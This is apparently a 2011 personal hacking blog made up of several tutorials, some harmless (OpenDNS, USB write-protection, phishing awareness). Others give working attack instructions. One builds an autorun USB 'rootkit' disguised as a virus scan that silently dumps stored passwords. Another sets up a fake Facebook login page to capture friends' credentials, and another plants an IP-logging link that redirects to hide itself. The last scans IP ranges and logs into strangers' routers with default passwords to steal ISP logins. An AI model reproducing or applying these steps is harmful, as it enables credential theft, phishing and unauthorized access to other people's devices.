12/25/2011

How to Hack Windows Administrator Password
Posted By
SaThish(๏̯͡๏) ....

Hi Everyone this post is How to Hack Windows Admin Password. This hack will show U how to reset Windows admin password (for Win 2000, XP, Vista nD ## Win 7) at times when u forget it R when U want to gain access to a computer for which u do not know the password.
Most of us have experienced a situation where N v need to gain access to a computer which is password protected or at times V may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which u can reset the password R make the password empty (remove the password) so that you can gain administrator access to the computer. U can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means U need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.


How it works?


Most Windows operating systems stores the login passwords nD other encrypted passwords in a file called SAM (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off  Ur computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
It is recommended that U download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once U download you ll get a bootable image which u need to burn it onto your CD. Now boot Ur computer from this CD and follow the screen instructions to Reset the password.

Another simple way to reset non-administrator account passwords



Here is another simple way through which u can reset the password of any NON-Administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type Net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type Net user John *** and hit Enter. Now the system will ask you to enter the new password for the account. Thats it. Now U’ve successfully reset the password for John without knowing his old password.
So in this way u can reset the password of any Windows account at times when you forget it so that you need not Re-install your OS for any reason. I hope this helps.

11/28/2011

How to Sniff Password usin PEN DrivE

Posted By
SaThish(๏̯͡) ....

Hi Followers this Post is How to Sniff Password using USB Drive, As V all know Windows stores most of d passwords which r used on a daily basis including instant messenger passwords such as Gtalk, Skype, Yahoo, AOL, Win messenger etc. Along with these Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE, Google chrome nD Firefox. There exists many tools for recoverin these passswords from their stored places. Using these tools nd an USB pendrive U can create Ur own Rootkit to sniff passwords from any computer. V need the following tools to create our Rootkit.


MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Win. Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided vit Netscape 7, Trillian, Miranda, and GAIM.


Mail PassView: Recovers the passwords of the followin E-mail programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover D passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if U use d associated programs of these accounts.


IE Passview: IE PassView s A small utility that reveals D passwords stored by Internet Explorer browser. It supports D new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0


Protected Storage PassView: Recovers all passwords stored inside D Protected Storage, includin D Auto Complete passwords of Internet Exp, passwords of Password-protected sites, MSN Explorer Passwords, nd more…


PasswordFox: PasswordFox S A small password recovery tool that allows U to view the user names nd passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays d passwords stored in Ur current profile, but U can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
Here S A step byyyyy step procedre to create the password Hacking Toolkit.

1. Download (click the above links) All the 5 tools extract them nd copy only the executables(.exe files) into Ur USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into Ur USB 

2. Create a new Notepad nd write the following text into it

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
}

save the Notepad nd rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto Ur USB pendrive.
3. Create another Notepad nd write the following text onto it.

{
            start mspass.exe /stext mspass.txt
            start mailpv.exe /stext mailpv.txt
            start iepv.exe /stext iepv.txt
            start pspv.exe /stext pspv.txt
            start passwordfox.exe /stext passwordfox.txt
}

save the Notepad  nd rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now Ur rootkit S ready and U r all set to sniff the passwords. U can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive nd the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and U’ll see the stored passwords in the .TXT files.
This Hack works on WIN 2000, XP , VISTA  nD WIN 7

Reference abt  Sniffer 
http://compnetworking.about.com/od/networksecurityprivacy/g/bldef_sniffer.htm


 


11/06/2011

Fastest Ways To Increase Twitter Followers



This Post is How to Increase Ur Twitter Followers U might know sometimes Twitter is all about having more number of followers but I prefer N being influential than having huge followers but some would still say that to be an influence R 1 needs large follower base. Many people keep on asking and searching about How to increase twitter followers. Well here I'm wit an easy N fastest and convenient way to increase Twitter followers. Hope you will N - joy it and don’t forget to follow me on Twitter @saysathish... He he he:-) 

 
 


Follow nD get followed . There is a new tool I have come across named Twiends

How to use Twiends?
 To use twiends to increase Ur twitter followers, all you got to do is to follow the step mentioned below:


1.     Sign up to Twiends and authorize Ur twitter account

2.     Change the settings as you want to nD start following people listed there.

3.     Once U start following , It will increase your spark count which will B used to gain followers for Ur account.

4.     Sit back nD let it work for you’re done

Now wait for few hours nD you ll see A definite increase in Ur followers nd yeah, It really works! So, what are you waiting for? Click here NOW!!!

Before U proceed, I just would lik to let U know that this tool is about mass follow nD according to twitter rules nd API, over using it may harm Ur profile nd may lead to deactivation. I have used it and working fine. UUU may try on Ur risk. Cheers!!!

   
Posted By
Sathish Ramakrishnan




10/25/2011

HACK FACEBOOK PASSWORD via FAKE LOGIN PAGE / FAKE SCRIPTS





Hello frienDs Ru Very curious to “Hack Facebook password”  ll then this post is just for U, Most frnDs ask me to tell us the Easiest way to Hack Facebook password, so here are some ways to hack FB password:

1.Facebook phishing
2.Key logging
3.virus

I ll explain u the method which is very easy to use that is via using fake login scripts nD Fake Login Page to Hack facebook password. check it out.
   
Fake login page

A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.

However, these Fake login pages are created just for the purpose of stealing other’s passwords.

PROCEDURE

First of all download Facebook fake login page from here


1.Once U have downloaded Facebook fake login page Now extract contents in a folder

2.In that. open “pass.php” and find (CTRL+F) ‘http://www.saysathish.blogspot.com‘  it tohttp://www.Facebook.com


Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘ instead of “http://www.saysathish.blogspot.com“
Now Save it.

3.Open Fake page in wordpad

4.Now press ctrl+F and search for the term “action=” now change its value to pass.php i.e. action=pass.php


5.Create an iD in  X10Hosting.com , t35.com  , 110mb.com , ripway.com  R else which you know Web Hosting Server

6.Then upload the contents into a directory

7.For that,after creating an ID you should go to file manager nD upload all these files.

8.Then just go to Facebook.htm  nD try out whether its working .
After U type the file , a password file named pass.txt will be created in the same directory.
U can see what username and password entered.

9. Distribute the Facebook.HTML URL (ie: yoursite.com/Facebook.HTML) to Ur friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in Ur site. Download the file to see the password inside it.

Posted By
sathish Ramakrishnan
        

10/11/2011

What is Phishing?

Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets.

Phishing is typically carried out by email R instant messaging and often directs users to enter details at a website, although phone contact has also been used. Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.

Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as FACEBOOK, ORKUT, MYSPACE are also a target of phishing.

Spoofed/Fraudulent E-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake E-mail that appears to have come from a Trusted Website .The Hacker may request us to verify username & password by replaying to a given email address.

TECHNIQUES BEHIND PHISHING ATTACK

1. Link Manipulation
Most methods of phishing use some form of technical deception designed to make a link in an Email appear to belong to some trusted organization R spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL



instead of www.microsoft.com



2. Filter Evasion
Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. This is the reason Gmail or Yahoo will disable the images by default for incoming mails.


How to identify a fraudulent e-mail?
Here are a few phrases to look for if you think an e-mail message is a phishing scam.

Verify your account.”
Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through E-mail.

“If you don’t respond within 48 hours, your account will be closed.”
These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”
Phishing E-mail messages are usually sent out in bulk andoften do not contain your first or last name.

“Click the link below to gain access to your account.”
HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.
Notice in the following example that resting the mouse pointer on the link reveals the real Web address, as shown in the box with the yellow background. The string of cryptic numbers looks nothing like the company’s Web address, which is a suspicious sign.

So the Bottom line to defend from phishing attack is
1. Never assume that an email is valid based on the sender’s email address.
2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.
3. An email from trusted organization will never contain attachments or software.
4. Clicking on a link in an email is the most insecure way to get to your account


Posted By
sathish Ramakrishnan
        
       


9/12/2011

Find the IP Address of REMOTE System






Hai Followers Now it is Easier for you to find the IP address of the remote Computer of Ur Friends R any Remote computer which is Using  PHP Scripts.
I Got this PHP scripts in Internet  

Here s A step by step process to find out the IP address of the Remote Computer

1. ( Download ) the IP Finder script (IP_Finder.ZIP) Which I Got.
2. Open a New acc. in X10Hosting , t35 , 110mb R else which you know Web Hosting Servie which Supports PHP
3. Extract the IP_Finder.ZIP file nD upload  the two files ip.php and ip_log.txt in your web hosting acc. in the File Manager.
4. Set the permission as 777 for the file ip_log.txt.
Now U are all set to find the IP address of your friend R any remote computer. All you have to do is send the link of ip.php to Ur friend or the person with whom you’re chattin. Once the person click’s  the link, his/her IP address is recorded in the file ip_log.txt.
For your better understanding Jus look the following example.
Suppose you open a New acc. in the X10hosting.com with the subdomain as sathishblog, then your IP Finder link would be

U have to send the above link to you friend via Email  R while chattin and ask him to visit the link. Once Ur friend clicks  the link, his/her IP address will be recorded along with the Date and Time in the ip_log.txt  file. After recording the IP address, the script will be Redirect to www.google.com, U can also change the Redirect site as wish. so as to avoid any suspicion from the User
To find the RecordeD IP address check the logs using the followin link.

The sample log will be in the followin format

10.10.10.1 Thursday 12th of SEP 2011 05:31:27 AM
10.10.10.2 Thursday 12th of SEP 2011 05:31:28 AM
10.10.10.3 Thursday 12th of SEP 2011 05:31:31 AM

For Any Query's Mail to saysathish@gmail.com (R) sathishkrrish@gmail.com

PPosted By
sssssathish Ramakrishnannnnn


    





8/21/2011

WaNNa HACK your BSNL Broadband ?



HI BSNL Broadband user. You HaviN Nice chance to Hack your BSNL Broadband for High Speed usage.The BSNL users that  who are facing frequent DNS Issue R DNS unresponsive R it takes a long duration and many times just time out. The solution is there is a Small Hack on BSNL to solve this issue by Use third party DNS servers instead of BSNL DNS servers. 

Just open www.opendns.com 
Register an account
Just reconfigure your network to use the following DNS servers:
"
208.67.222.222
208.67.220.220
                             "
The Detailed instructions specific to operating system R your BSNL modem are available in the OpenDNS.com  website itself. After reconfigured your  BSNL modem to use the above 2 IP addresses, your DNS problems gets vanished.
Other Freebies in the OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. 
After you Hacking your BSNL DNS servers, you can feel the improvement in your broadband speed.

PosteD BYYYY
       Sathish....

8/16/2011

USB WRITE PROTECT USing SOFTWARE



Hi Amigos Last Week i Posted USB Write Protect With out Any Software by Using Registry Editor ( REG EDIT) But the Method s very Hectic to Use.
I came to know about"USB Write Protect  by using Software. This Software is Very Flexible to use and Easy to Install.

       

PosteD BYYYY
       Sathish....

8/06/2011

Write-Protect USB Flash Drive with-out Software



To Secure the USD Flash drive with out-any Software. This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

3. Create a New Key named as StorageDevicePolicies.To do this right-click on Control, an New->Key and name it as StorageDevicePolicies.

4. Now right-click on StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.

5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.
To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.

PosteD BYYYY
       Sathish....






7/24/2011

How to Hack an Ethernet ADSL Router


Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Suppose your IP is117.192.195.101, you can set the range something as117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selectionenter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.



I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go toOptionsinstead of Tools
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.


step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.

If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.